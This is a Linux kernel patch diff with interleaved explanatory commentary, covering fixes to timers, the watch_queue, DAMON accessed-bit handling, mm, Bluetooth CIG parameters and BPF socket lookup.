+ /*
+- * This is called by do_exit or de_thread, only when nobody else can
+- * modify the signal->posix_timers list. Yet we need sighand->siglock
+- * to prevent the race with /proc/pid/timers.
++ * Invoked from do_exit() when the last thread of a thread group exits.
++ * At that point no other task can access the timers of the dying
++ * task anymore.
+  */
+ void exit_itimers(struct task_struct *tsk)
+ {
+@@ -1067,10 +1092,12 @@ void exit_itimers(struct task_struct *tsk)
+ 	if (list_empty(&tsk->signal->posix_timers))
+ 		return;
+ 
++	/* Protect against concurrent read via /proc/$PID/timers */
+ 	spin_lock_irq(&tsk->sighand->siglock);
+ 	list_replace_init(&tsk->signal->posix_timers, &timers);
+ 	spin_unlock_irq(&tsk->sighand->siglock);
+ 
++	/* The timers are no longer accessible via tsk::signal */
+ 	while (!list_empty(&timers)) {
+ 		tmr = list_first_entry(&timers, struct k_itimer, list);
+ 		itimer_delete(tmr);
+diff --git a/kernel/time/tick-sched.c b/kernel/time/tick-sched.c
+index d6fb6a676bbbb..1ad89eec2a55f 100644
+--- a/kernel/time/tick-sched.c
++++ b/kernel/time/tick-sched.c
+@@ -1046,7 +1046,7 @@ static bool report_idle_softirq(void)
+ 			return false;
+ 	}
+ 
+-	if (ratelimit < 10)
++	if (ratelimit >= 10)
+ 		return false;
+ 
+ 	/* On RT, softirqs handling may be waiting on some lock */
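
The original ratelimit < 10 test suppressed the first ten reports and then reported forever, the exact inverse of a rate limit; ratelimit >= 10 restores "report at most ten times, then go quiet". The intended counter shape, sketched with illustrative names:

    #include <linux/printk.h>

    static unsigned int reported;

    /* Report at most ten times, then stay silent (illustrative). */
    static bool maybe_report(const char *msg)
    {
            if (reported >= 10)
                    return false;   /* budget exhausted */
            pr_warn("%s\n", msg);
            reported++;
            return true;
    }
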
+diff --git a/kernel/watch_queue.c b/kernel/watch_queue.c
+index f10f403104e7d..28ed71d277bd7 100644
+--- a/kernel/watch_queue.c
++++ b/kernel/watch_queue.c
+@@ -43,7 +43,7 @@ MODULE_LICENSE("GPL");
+ static inline bool lock_wqueue(struct watch_queue *wqueue)
+ {
+ 	spin_lock_bh(&wqueue->lock);
+-	if (unlikely(wqueue->defunct)) {
++	if (unlikely(!wqueue->pipe)) {
+ 		spin_unlock_bh(&wqueue->lock);
+ 		return false;
+ 	}
+@@ -105,9 +105,6 @@ static bool post_one_notification(struct watch_queue *wqueue,
+ 	unsigned int head, tail, mask, note, offset, len;
+ 	bool done = false;
+ 
+-	if (!pipe)
+-		return false;
+-
+ 	spin_lock_irq(&pipe->rd_wait.lock);
+ 
+ 	mask = pipe->ring_size - 1;
+@@ -604,8 +601,11 @@ void watch_queue_clear(struct watch_queue *wqueue)
+ 	rcu_read_lock();
+ 	spin_lock_bh(&wqueue->lock);
+ 
+-	/* Prevent new notifications from being stored. */
+-	wqueue->defunct = true;
++	/*
++	 * This pipe can be freed by callers like free_pipe_info().
++	 * Removing this reference also prevents new notifications.
++	 */
++	wqueue->pipe = NULL;
+ 
+ 	while (!hlist_empty(&wqueue->watches)) {
+ 		watch = hlist_entry(wqueue->watches.first, struct watch, queue_node);
+diff --git a/kernel/watchdog_hld.c b/kernel/watchdog_hld.c
+index 247bf0b1582ca..1e8a49dc956e2 100644
+--- a/kernel/watchdog_hld.c
++++ b/kernel/watchdog_hld.c
+@@ -114,14 +114,14 @@ static void watchdog_overflow_callback(struct perf_event *event,
+ 	/* Ensure the watchdog never gets throttled */
+ 	event->hw.interrupts = 0;
+ 
++	if (!watchdog_check_timestamp())
++		return;
++
+ 	if (__this_cpu_read(watchdog_nmi_touch) == true) {
+ 		__this_cpu_write(watchdog_nmi_touch, false);
+ 		return;
+ 	}
+ 
+-	if (!watchdog_check_timestamp())
+-		return;
+-
+ 	/* check for a hardlockup
+ 	 * This is done by making sure our timer interrupt
+ 	 * is incrementing.  The timer interrupt should have
+diff --git a/lib/bitmap.c b/lib/bitmap.c
+index 1c81413c51f86..ddb31015e38ae 100644
+--- a/lib/bitmap.c
++++ b/lib/bitmap.c
+@@ -1495,7 +1495,7 @@ void bitmap_to_arr32(u32 *buf, const unsigned long *bitmap, unsigned int nbits)
+ EXPORT_SYMBOL(bitmap_to_arr32);
+ #endif
+ 
+-#if (BITS_PER_LONG == 32) && defined(__BIG_ENDIAN)
++#if BITS_PER_LONG == 32
+ /**
+  * bitmap_from_arr64 - copy the contents of u64 array of bits to bitmap
+  *	@bitmap: array of unsigned longs, the destination bitmap
+diff --git a/lib/ts_bm.c b/lib/ts_bm.c
+index 1f2234221dd11..c8ecbf74ef295 100644
+--- a/lib/ts_bm.c
++++ b/lib/ts_bm.c
+@@ -60,10 +60,12 @@ static unsigned int bm_find(struct ts_config *conf, struct ts_state *state)
+ 	struct ts_bm *bm = ts_config_priv(conf);
+ 	unsigned int i, text_len, consumed = state->offset;
+ 	const u8 *text;
+-	int shift = bm->patlen - 1, bs;
++	int bs;
+ 	const u8 icase = conf->flags & TS_IGNORECASE;
+ 
+ 	for (;;) {
++		int shift = bm->patlen - 1;
++
+ 		text_len = conf->get_next_block(consumed, &text, conf, state);
+ 
+ 		if (unlikely(text_len == 0))
+diff --git a/mm/damon/ops-common.c b/mm/damon/ops-common.c
+index 75409601f9349..13b99975cbc2c 100644
+--- a/mm/damon/ops-common.c
++++ b/mm/damon/ops-common.c
+@@ -33,7 +33,7 @@ struct page *damon_get_page(unsigned long pfn)
+ 	return page;
+ }
+ 
+-void damon_ptep_mkold(pte_t *pte, struct mm_struct *mm, unsigned long addr)
++void damon_ptep_mkold(pte_t *pte, struct vm_area_struct *vma, unsigned long addr)
+ {
+ 	bool referenced = false;
+ 	struct page *page = damon_get_page(pte_pfn(*pte));
+@@ -41,13 +41,11 @@ void damon_ptep_mkold(pte_t *pte, struct mm_struct *mm, unsigned long addr)
+ 	if (!page)
+ 		return;
+ 
+-	if (pte_young(*pte)) {
++	if (ptep_test_and_clear_young(vma, addr, pte))
+ 		referenced = true;
+-		*pte = pte_mkold(*pte);
+-	}
+ 
+ #ifdef CONFIG_MMU_NOTIFIER
+-	if (mmu_notifier_clear_young(mm, addr, addr + PAGE_SIZE))
++	if (mmu_notifier_clear_young(vma->vm_mm, addr, addr + PAGE_SIZE))
+ 		referenced = true;
+ #endif /* CONFIG_MMU_NOTIFIER */
+ 
+@@ -58,7 +56,7 @@ void damon_ptep_mkold(pte_t *pte, struct mm_struct *mm, unsigned long addr)
+ 	put_page(page);
+ }
+ 
+-void damon_pmdp_mkold(pmd_t *pmd, struct mm_struct *mm, unsigned long addr)
++void damon_pmdp_mkold(pmd_t *pmd, struct vm_area_struct *vma, unsigned long addr)
+ {
+ #ifdef CONFIG_TRANSPARENT_HUGEPAGE
+ 	bool referenced = false;
+@@ -67,13 +65,11 @@ void damon_pmdp_mkold(pmd_t *pmd, struct mm_struct *mm, unsigned long addr)
+ 	if (!page)
+ 		return;
+ 
+-	if (pmd_young(*pmd)) {
++	if (pmdp_test_and_clear_young(vma, addr, pmd))
+ 		referenced = true;
+-		*pmd = pmd_mkold(*pmd);
+-	}
+ 
+ #ifdef CONFIG_MMU_NOTIFIER
+-	if (mmu_notifier_clear_young(mm, addr, addr + HPAGE_PMD_SIZE))
++	if (mmu_notifier_clear_young(vma->vm_mm, addr, addr + HPAGE_PMD_SIZE))
+ 		referenced = true;
+ #endif /* CONFIG_MMU_NOTIFIER */
+ 
+diff --git a/mm/damon/ops-common.h b/mm/damon/ops-common.h
+index 8d82d37222042..e062a8874e411 100644
+--- a/mm/damon/ops-common.h
++++ b/mm/damon/ops-common.h
+@@ -9,8 +9,8 @@
+ 
+ struct page *damon_get_page(unsigned long pfn);
+ 
+-void damon_ptep_mkold(pte_t *pte, struct mm_struct *mm, unsigned long addr);
+-void damon_pmdp_mkold(pmd_t *pmd, struct mm_struct *mm, unsigned long addr);
++void damon_ptep_mkold(pte_t *pte, struct vm_area_struct *vma, unsigned long addr);
++void damon_pmdp_mkold(pmd_t *pmd, struct vm_area_struct *vma, unsigned long addr);
+ 
+ int damon_cold_score(struct damon_ctx *c, struct damon_region *r,
+ 			struct damos *s);
+diff --git a/mm/damon/paddr.c b/mm/damon/paddr.c
+index 402d30b37aba9..7bc8d79c7fa07 100644
+--- a/mm/damon/paddr.c
++++ b/mm/damon/paddr.c
+@@ -24,9 +24,9 @@ static bool __damon_pa_mkold(struct folio *folio, struct vm_area_struct *vma,
+ 	while (page_vma_mapped_walk(&pvmw)) {
+ 		addr = pvmw.address;
+ 		if (pvmw.pte)
+-			damon_ptep_mkold(pvmw.pte, vma->vm_mm, addr);
++			damon_ptep_mkold(pvmw.pte, vma, addr);
+ 		else
+-			damon_pmdp_mkold(pvmw.pmd, vma->vm_mm, addr);
++			damon_pmdp_mkold(pvmw.pmd, vma, addr);
+ 	}
+ 	return true;
+ }
+diff --git a/mm/damon/vaddr.c b/mm/damon/vaddr.c
+index 15f03df66db60..26d561af74e41 100644
+--- a/mm/damon/vaddr.c
++++ b/mm/damon/vaddr.c
+@@ -311,7 +311,7 @@ static int damon_mkold_pmd_entry(pmd_t *pmd, unsigned long addr,
+ 		}
+ 
+ 		if (pmd_trans_huge(*pmd)) {
+-			damon_pmdp_mkold(pmd, walk->mm, addr);
++			damon_pmdp_mkold(pmd, walk->vma, addr);
+ 			spin_unlock(ptl);
+ 			return 0;
+ 		}
+@@ -323,7 +323,7 @@ static int damon_mkold_pmd_entry(pmd_t *pmd, unsigned long addr,
+ 	pte = pte_offset_map_lock(walk->mm, pmd, addr, &ptl);
+ 	if (!pte_present(*pte))
+ 		goto out;
+-	damon_ptep_mkold(pte, walk->mm, addr);
++	damon_ptep_mkold(pte, walk->vma, addr);
+ out:
+ 	pte_unmap_unlock(pte, ptl);
+ 	return 0;
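
Open-coding *pte = pte_mkold(*pte) is a non-atomic read-modify-write that can race with hardware setting the accessed bit; ptep_test_and_clear_young() does the test-and-clear atomically and takes the vma so architectures can perform any required notification or flushing. A sketch of the accessor split (the wrapper is illustrative; pmdp_test_and_clear_young() is THP-only in real kernels):

    #include <linux/mm.h>
    #include <linux/pgtable.h>

    /* Atomically check and clear the accessed bit (illustrative). */
    static bool entry_was_young(struct vm_area_struct *vma,
                                unsigned long addr, pte_t *pte, pmd_t *pmd)
    {
            if (pte)
                    return ptep_test_and_clear_young(vma, addr, pte);
            return pmdp_test_and_clear_young(vma, addr, pmd);
    }
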
+diff --git a/mm/memory.c b/mm/memory.c
+index 77549434d13a7..2083078cd0615 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -3980,6 +3980,13 @@ vm_fault_t do_swap_page(struct vm_fault *vmf)
+ 		}
+ 	}
+ 
++	/*
++	 * Some architectures may have to restore extra metadata to the page
++	 * when reading from swap. This metadata may be indexed by swap entry
++	 * so this must be called before swap_free().
++	 */
++	arch_swap_restore(entry, folio);
++
+ 	/*
+ 	 * Remove the swap entry and conditionally try to free up the swapcache.
+ 	 * We're already holding a reference on the page but haven't mapped it
+diff --git a/mm/mmap.c b/mm/mmap.c
+index b8af52db3bbe0..41a240bd81df8 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -767,7 +767,8 @@ int __vma_adjust(struct vm_area_struct *vma, unsigned long start,
+ 	}
+ 	if (end != vma->vm_end) {
+ 		if (vma->vm_end > end) {
+-			if (!insert || (insert->vm_start != end)) {
++			if ((vma->vm_end + adjust_next != end) &&
++			    (!insert || (insert->vm_start != end))) {
+ 				vma_mas_szero(&mas, end, vma->vm_end);
+ 				mas_reset(&mas);
+ 				VM_WARN_ON(insert &&
+@@ -2484,7 +2485,7 @@ do_mas_align_munmap(struct ma_state *mas, struct vm_area_struct *vma,
+ 			error = mas_store_gfp(&mas_detach, split, GFP_KERNEL);
+ 			if (error)
+ 				goto munmap_gather_failed;
+-			if (next->vm_flags & VM_LOCKED)
++			if (split->vm_flags & VM_LOCKED)
+ 				locked_vm += vma_pages(split);
+ 
+ 			count++;
+diff --git a/mm/shmem.c b/mm/shmem.c
+index a8d9fd039d0aa..aba041a3df739 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -4137,7 +4137,7 @@ static struct file_system_type shmem_fs_type = {
+ 	.name		= "tmpfs",
+ 	.init_fs_context = ramfs_init_fs_context,
+ 	.parameters	= ramfs_fs_parameters,
+-	.kill_sb	= kill_litter_super,
++	.kill_sb	= ramfs_kill_sb,
+ 	.fs_flags	= FS_USERNS_MOUNT,
+ };
+ 
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index ab9f00252dc2a..fef09d2121384 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -770,6 +770,11 @@ static void le_conn_timeout(struct work_struct *work)
+ 	hci_abort_conn(conn, HCI_ERROR_REMOTE_USER_TERM);
+ }
+ 
++struct iso_cig_params {
++	struct hci_cp_le_set_cig_params cp;
++	struct hci_cis_params cis[0x1f];
++};
++
+ struct iso_list_data {
+ 	union {
+ 		u8  cig;
+@@ -781,10 +786,7 @@ struct iso_list_data {
+ 		u16 sync_handle;
+ 	};
+ 	int count;
+-	struct {
+-		struct hci_cp_le_set_cig_params cp;
+-		struct hci_cis_params cis[0x11];
+-	} pdu;
++	struct iso_cig_params pdu;
+ };
+ 
+ static void bis_list(struct hci_conn *conn, void *data)
+@@ -1705,10 +1707,33 @@ static int hci_le_create_big(struct hci_conn *conn, struct bt_iso_qos *qos)
+ 	return hci_send_cmd(hdev, HCI_OP_LE_CREATE_BIG, sizeof(cp), &cp);
+ }
+ 
++static void set_cig_params_complete(struct hci_dev *hdev, void *data, int err)
++{
++	struct iso_cig_params *pdu = data;
++
++	bt_dev_dbg(hdev, "");
++
++	if (err)
++		bt_dev_err(hdev, "Unable to set CIG parameters: %d", err);
++
++	kfree(pdu);
++}
++
++static int set_cig_params_sync(struct hci_dev *hdev, void *data)
++{
++	struct iso_cig_params *pdu = data;
++	u32 plen;
++
++	plen = sizeof(pdu->cp) + pdu->cp.num_cis * sizeof(pdu->cis[0]);
++	return __hci_cmd_sync_status(hdev, HCI_OP_LE_SET_CIG_PARAMS, plen, pdu,
++				     HCI_CMD_TIMEOUT);
++}
++
+ static bool hci_le_set_cig_params(struct hci_conn *conn, struct bt_iso_qos *qos)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+ 	struct iso_list_data data;
++	struct iso_cig_params *pdu;
+ 
+ 	memset(&data, 0, sizeof(data));
+ 
+@@ -1779,12 +1804,18 @@ static bool hci_le_set_cig_params(struct hci_conn *conn, struct bt_iso_qos *qos)
+ 	if (qos->cis == BT_ISO_QOS_CIS_UNSET || !data.pdu.cp.num_cis)
+ 		return false;
+ 
+-	if (hci_send_cmd(hdev, HCI_OP_LE_SET_CIG_PARAMS,
+-			 sizeof(data.pdu.cp) +
+-			 (data.pdu.cp.num_cis * sizeof(*data.pdu.cis)),
+-			 &data.pdu) < 0)
++	pdu = kzalloc(sizeof(*pdu), GFP_KERNEL);
++	if (!pdu)
+ 		return false;
+ 
++	memcpy(pdu, &data.pdu, sizeof(*pdu));
++
++	if (hci_cmd_sync_queue(hdev, set_cig_params_sync, pdu,
++			       set_cig_params_complete) < 0) {
++		kfree(pdu);
++		return false;
++	}
++
+ 	return true;
+ }
+ 
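
The allocation and queueing above follow a standard ownership handoff: the payload belongs to the caller until hci_cmd_sync_queue() accepts it, after which the completion callback is the single place that frees it, on success and on error alike. The generic shape (queue_async() and friends are hypothetical names):

    #include <linux/slab.h>

    /* Hand a heap payload to async work; free on exactly one path. */
    static int submit(struct ctx *c, const struct payload *src)
    {
            struct payload *p = kmemdup(src, sizeof(*p), GFP_KERNEL);

            if (!p)
                    return -ENOMEM;
            if (queue_async(c, do_work, p, on_done) < 0) {
                    kfree(p);       /* never queued: still ours */
                    return -EIO;
            }
            return 0;               /* on_done() frees p */
    }
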
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index 21416ccc30ab2..b272cc1f36481 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -6307,23 +6307,18 @@ static void process_adv_report(struct hci_dev *hdev, u8 type, bdaddr_t *bdaddr,
+ 		return;
+ 	}
+ 
+-	/* When receiving non-connectable or scannable undirected
+-	 * advertising reports, this means that the remote device is
+-	 * not connectable and then clearly indicate this in the
+-	 * device found event.
+-	 *
+-	 * When receiving a scan response, then there is no way to
++	/* When receiving a scan response, then there is no way to
+ 	 * know if the remote device is connectable or not. However
+ 	 * since scan responses are merged with a previously seen
+ 	 * advertising report, the flags field from that report
+ 	 * will be used.
+ 	 *
+-	 * In the really unlikely case that a controller get confused
+-	 * and just sends a scan response event, then it is marked as
+-	 * not connectable as well.
++	 * In the unlikely case that a controller just sends a scan
++	 * response event that doesn't match the pending report, then
++	 * it is marked as a standalone SCAN_RSP.
+ 	 */
+ 	if (type == LE_ADV_SCAN_RSP)
+-		flags = MGMT_DEV_FOUND_NOT_CONNECTABLE;
++		flags = MGMT_DEV_FOUND_SCAN_RSP;
+ 
+ 	/* If there's nothing pending either store the data from this
+ 	 * event or send an immediate device found event if the data
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 1805ddee0cd02..37131a36700a1 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -4567,23 +4567,17 @@ static int hci_dev_setup_sync(struct hci_dev *hdev)
+ 	invalid_bdaddr = test_bit(HCI_QUIRK_INVALID_BDADDR, &hdev->quirks);
+ 
+ 	if (!ret) {
+-		if (test_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks)) {
+-			if (!bacmp(&hdev->public_addr, BDADDR_ANY))
+-				hci_dev_get_bd_addr_from_property(hdev);
+-
+-			if (bacmp(&hdev->public_addr, BDADDR_ANY) &&
+-			    hdev->set_bdaddr) {
+-				ret = hdev->set_bdaddr(hdev,
+-						       &hdev->public_addr);
+-
+-				/* If setting of the BD_ADDR from the device
+-				 * property succeeds, then treat the address
+-				 * as valid even if the invalid BD_ADDR
+-				 * quirk indicates otherwise.
+-				 */
+-				if (!ret)
+-					invalid_bdaddr = false;
+-			}
++		if (test_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks) &&
++		    !bacmp(&hdev->public_addr, BDADDR_ANY))
++			hci_dev_get_bd_addr_from_property(hdev);
++
++		if ((invalid_bdaddr ||
++		     test_bit(HCI_QUIRK_USE_BDADDR_PROPERTY, &hdev->quirks)) &&
++		    bacmp(&hdev->public_addr, BDADDR_ANY) &&
++		    hdev->set_bdaddr) {
++			ret = hdev->set_bdaddr(hdev, &hdev->public_addr);
++			if (!ret)
++				invalid_bdaddr = false;
+ 		}
+ 	}
+ 
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index fc4ba0884da96..815f2abe918ef 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -859,6 +859,12 @@ static u32 get_supported_settings(struct hci_dev *hdev)
+ 	    hdev->set_bdaddr)
+ 		settings |= MGMT_SETTING_CONFIGURATION;
+ 
++	if (cis_central_capable(hdev))
++		settings |= MGMT_SETTING_CIS_CENTRAL;
++
++	if (cis_peripheral_capable(hdev))
++		settings |= MGMT_SETTING_CIS_PERIPHERAL;
++
+ 	settings |= MGMT_SETTING_PHY_CONFIGURATION;
+ 
+ 	return settings;
+@@ -932,6 +938,12 @@ static u32 get_current_settings(struct hci_dev *hdev)
+ 	if (hci_dev_test_flag(hdev, HCI_WIDEBAND_SPEECH_ENABLED))
+ 		settings |= MGMT_SETTING_WIDEBAND_SPEECH;
+ 
++	if (cis_central_capable(hdev))
++		settings |= MGMT_SETTING_CIS_CENTRAL;
++
++	if (cis_peripheral_capable(hdev))
++		settings |= MGMT_SETTING_CIS_PERIPHERAL;
++
+ 	return settings;
+ }
+ 
+diff --git a/net/bridge/br_if.c b/net/bridge/br_if.c
+index 228fd5b20f109..0989074f316ef 100644
+--- a/net/bridge/br_if.c
++++ b/net/bridge/br_if.c
+@@ -166,8 +166,9 @@ void br_manage_promisc(struct net_bridge *br)
+ 			 * This lets us disable promiscuous mode and write
+ 			 * this config to hw.
+ 			 */
+-			if (br->auto_cnt == 0 ||
+-			    (br->auto_cnt == 1 && br_auto_port(p)))
++			if ((p->dev->priv_flags & IFF_UNICAST_FLT) &&
++			    (br->auto_cnt == 0 ||
++			     (br->auto_cnt == 1 && br_auto_port(p))))
+ 				br_port_clear_promisc(p);
+ 			else
+ 				br_port_set_promisc(p);
+diff --git a/net/core/filter.c b/net/core/filter.c
+index b79a070fa8246..da71e6812ab51 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -6474,12 +6474,11 @@ static struct sock *sk_lookup(struct net *net, struct bpf_sock_tuple *tuple,
+ static struct sock *
+ __bpf_skc_lookup(struct sk_buff *skb, struct bpf_sock_tuple *tuple, u32 len,
+ 		 struct net *caller_net, u32 ifindex, u8 proto, u64 netns_id,
+-		 u64 flags)
++		 u64 flags, int sdif)
+ {
+ 	struct sock *sk = NULL;
+ 	struct net *net;
+ 	u8 family;
+-	int sdif;
+ 
+ 	if (len == sizeof(tuple->ipv4))
+ 		family = AF_INET;
+@@ -6491,10 +6490,12 @@ __bpf_skc_lookup(struct sk_buff *skb, struct bpf_sock_tuple *tuple, u32 len,
+ 	if (unlikely(flags || !((s32)netns_id < 0 || netns_id <= S32_MAX)))
+ 		goto out;
+ 
+-	if (family == AF_INET)
+-		sdif = inet_sdif(skb);
+-	else
+-		sdif = inet6_sdif(skb);
++	if (sdif < 0) {
++		if (family == AF_INET)
++			sdif = inet_sdif(skb);
++		else
++			sdif = inet6_sdif(skb);
++	}
+ 
+ 	if ((s32)netns_id < 0) {
+ 		net = caller_net;
+@@ -6514,10 +6515,11 @@ out:
+ static struct sock *
+ __bpf_sk_lookup(struct sk_buff *skb, struct bpf_sock_tuple *tuple, u32 len,
+ 		struct net *caller_net, u32 ifindex, u8 proto, u64 netns_id,
+-		u64 flags)
++		u64 flags, int sdif)
+ {
+ 	struct sock *sk = __bpf_skc_lookup(skb, tuple, len, caller_net,
+-					   ifindex, proto, netns_id, flags);
++					   ifindex, proto, netns_id, flags,
++					   sdif);
+ 
+ 	if (sk) {
+ 		struct sock *sk2 = sk_to_full_sk(sk);
+@@ -6557,7 +6559,7 @@ bpf_skc_lookup(struct sk_buff *skb, struct bpf_sock_tuple *tuple, u32 len,
+ 	}
+ 
+ 	return __bpf_skc_lookup(skb, tuple, len, caller_net, ifindex, proto,
+-				netns_id, flags);
++				netns_id, flags, -1);
+ }
+ 
+ static struct sock *
+@@ -6646,6 +6648,78 @@ static const struct bpf_func_proto bpf_sk_lookup_udp_proto = {
+ 	.arg5_type	= ARG_ANYTHING,
+ };
+ 
++BPF_CALL_5(bpf_tc_skc_lookup_tcp, struct sk_buff *, skb,
++	   struct bpf_sock_tuple *, tuple, u32, len, u64, netns_id, u64, flags)
++{
++	struct net_device *dev = skb->dev;
++	int ifindex = dev->ifindex, sdif = dev_sdif(dev);
++	struct net *caller_net = dev_net(dev);
++
++	return (unsigned long)__bpf_skc_lookup(skb, tuple, len, caller_net,
++					       ifindex, IPPROTO_TCP, netns_id,
++					       flags, sdif);
++}
++
++static const struct bpf_func_proto bpf_tc_skc_lookup_tcp_proto = {
++	.func		= bpf_tc_skc_lookup_tcp,
++	.gpl_only	= false,
++	.pkt_access	= true,
++	.ret_type	= RET_PTR_TO_SOCK_COMMON_OR_NULL,
++	.arg1_type	= ARG_PTR_TO_CTX,
++	.arg2_type	= ARG_PTR_TO_MEM | MEM_RDONLY,
++	.arg3_type	= ARG_CONST_SIZE,
++	.arg4_type	= ARG_ANYTHING,
++	.arg5_type	= ARG_ANYTHING,
++};
++
++BPF_CALL_5(bpf_tc_sk_lookup_tcp, struct sk_buff *, skb,
++	   struct bpf_sock_tuple *, tuple, u32, len, u64, netns_id, u64, flags)
++{
++	struct net_device *dev = skb->dev;
++	int ifindex = dev->ifindex, sdif = dev_sdif(dev);
++	struct net *caller_net = dev_net(dev);
++
++	return (unsigned long)__bpf_sk_lookup(skb, tuple, len, caller_net,
++					      ifindex, IPPROTO_TCP, netns_id,
++					      flags, sdif);
++}
++
++static const struct bpf_func_proto bpf_tc_sk_lookup_tcp_proto = {
++	.func		= bpf_tc_sk_lookup_tcp,
++	.gpl_only	= false,
++	.pkt_access	= true,
++	.ret_type	= RET_PTR_TO_SOCKET_OR_NULL,
++	.arg1_type	= ARG_PTR_TO_CTX,
++	.arg2_type	= ARG_PTR_TO_MEM | MEM_RDONLY,
++	.arg3_type	= ARG_CONST_SIZE,
++	.arg4_type	= ARG_ANYTHING,
++	.arg5_type	= ARG_ANYTHING,
++};
++
++BPF_CALL_5(bpf_tc_sk_lookup_udp, struct sk_buff *, skb,
++	   struct bpf_sock_tuple *, tuple, u32, len, u64, netns_id, u64, flags)
++{
++	struct net_device *dev = skb->dev;
++	int ifindex = dev->ifindex, sdif = dev_sdif(dev);
++	struct net *caller_net = dev_net(dev);
++
++	return (unsigned long)__bpf_sk_lookup(skb, tuple, len, caller_net,
++					      ifindex, IPPROTO_UDP, netns_id,
++					      flags, sdif);
++}
++
++static const struct bpf_func_proto bpf_tc_sk_lookup_udp_proto = {
++	.func		= bpf_tc_sk_lookup_udp,
++	.gpl_only	= false,
++	.pkt_access	= true,
++	.ret_type	= RET_PTR_TO_SOCKET_OR_NULL,
++	.arg1_type	= ARG_PTR_TO_CTX,
++	.arg2_type	= ARG_PTR_TO_MEM | MEM_RDONLY,
++	.arg3_type	= ARG_CONST_SIZE,
++	.arg4_type	= ARG_ANYTHING,
++	.arg5_type	= ARG_ANYTHING,
++};
++
+ BPF_CALL_1(bpf_sk_release, struct sock *, sk)
+ {
+ 	if (sk && sk_is_refcounted(sk))
+@@ -6663,12 +6737,13 @@ static const struct bpf_func_proto bpf_sk_release_proto = {
+ BPF_CALL_5(bpf_xdp_sk_lookup_udp, struct xdp_buff *, ctx,
+ 	   struct bpf_sock_tuple *, tuple, u32, len, u32, netns_id, u64, flags)
+ {
+-	struct net *caller_net = dev_net(ctx->rxq->dev);
+-	int ifindex = ctx->rxq->dev->ifindex;
++	struct net_device *dev = ctx->rxq->dev;
++	int ifindex = dev->ifindex, sdif = dev_sdif(dev);
++	struct net *caller_net = dev_net(dev);
+ 
+ 	return (unsigned long)__bpf_sk_lookup(NULL, tuple, len, caller_net,
+ 					      ifindex, IPPROTO_UDP, netns_id,
+-					      flags);
++					      flags, sdif);
+ }
+ 
+ static const struct bpf_func_proto bpf_xdp_sk_lookup_udp_proto = {
+@@ -6686,12 +6761,13 @@ static const struct bpf_func_proto bpf_xdp_sk_lookup_udp_proto = {
+ BPF_CALL_5(bpf_xdp_skc_lookup_tcp, struct xdp_buff *, ctx,
+ 	   struct bpf_sock_tuple *, tuple, u32, len, u32, netns_id, u64, flags)
+ {
+-	struct net *caller_net = dev_net(ctx->rxq->dev);
+-	int ifindex = ctx->rxq->dev->ifindex;
++	struct net_device *dev = ctx->rxq->dev;
++	int ifindex = dev->ifindex, sdif = dev_sdif(dev);
++	struct net *caller_net = dev_net(dev);
+ 
+ 	return (unsigned long)__bpf_skc_lookup(NULL, tuple, len, caller_net,
+ 					       ifindex, IPPROTO_TCP, netns_id,
+-					       flags);
++					       flags, sdif);
+ }
+ 
+ static const struct bpf_func_proto bpf_xdp_skc_lookup_tcp_proto = {
+@@ -6709,12 +6785,13 @@ static const struct bpf_func_proto bpf_xdp_skc_lookup_tcp_proto = {
+ BPF_CALL_5(bpf_xdp_sk_lookup_tcp, struct xdp_buff *, ctx,
+ 	   struct bpf_sock_tuple *, tuple, u32, len, u32, netns_id, u64, flags)
+ {
+-	struct net *caller_net = dev_net(ctx->rxq->dev);
+-	int ifindex = ctx->rxq->dev->ifindex;
++	struct net_device *dev = ctx->rxq->dev;
++	int ifindex = dev->ifindex, sdif = dev_sdif(dev);
++	struct net *caller_net = dev_net(dev);
+ 
+ 	return (unsigned long)__bpf_sk_lookup(NULL, tuple, len, caller_net,
+ 					      ifindex, IPPROTO_TCP, netns_id,
+-					      flags);
++					      flags, sdif);
+ }
+ 
+ static const struct bpf_func_proto bpf_xdp_sk_lookup_tcp_proto = {
+@@ -6734,7 +6811,8 @@ BPF_CALL_5(bpf_sock_addr_skc_lookup_tcp, struct bpf_sock_addr_kern *, ctx,
+ {
+ 	return (unsigned long)__bpf_skc_lookup(NULL, tuple, len,
+ 					       sock_net(ctx->sk), 0,
+-					       IPPROTO_TCP, netns_id, flags);
++					       IPPROTO_TCP, netns_id, flags,
++					       -1);
+ }
+ 
+ static const struct bpf_func_proto bpf_sock_addr_skc_lookup_tcp_proto = {
+@@ -6753,7 +6831,7 @@ BPF_CALL_5(bpf_sock_addr_sk_lookup_tcp, struct bpf_sock_addr_kern *, ctx,
+ {
+ 	return (unsigned long)__bpf_sk_lookup(NULL, tuple, len,
+ 					      sock_net(ctx->sk), 0, IPPROTO_TCP,
+-					      netns_id, flags);
++					      netns_id, flags, -1);
+ }
+ 
+ static const struct bpf_func_proto bpf_sock_addr_sk_lookup_tcp_proto = {
+@@ -6772,7 +6850,7 @@ BPF_CALL_5(bpf_sock_addr_sk_lookup_udp, struct bpf_sock_addr_kern *, ctx,
+ {
+ 	return (unsigned long)__bpf_sk_lookup(NULL, tuple, len,
+ 					      sock_net(ctx->sk), 0, IPPROTO_UDP,
+-					      netns_id, flags);
++					      netns_id, flags, -1);
+ }
+ 
+ static const struct bpf_func_proto bpf_sock_addr_sk_lookup_udp_proto = {
+@@ -7902,9 +7980,9 @@ tc_cls_act_func_proto(enum bpf_func_id func_id, const struct bpf_prog *prog)
+ #endif
+ #ifdef CONFIG_INET
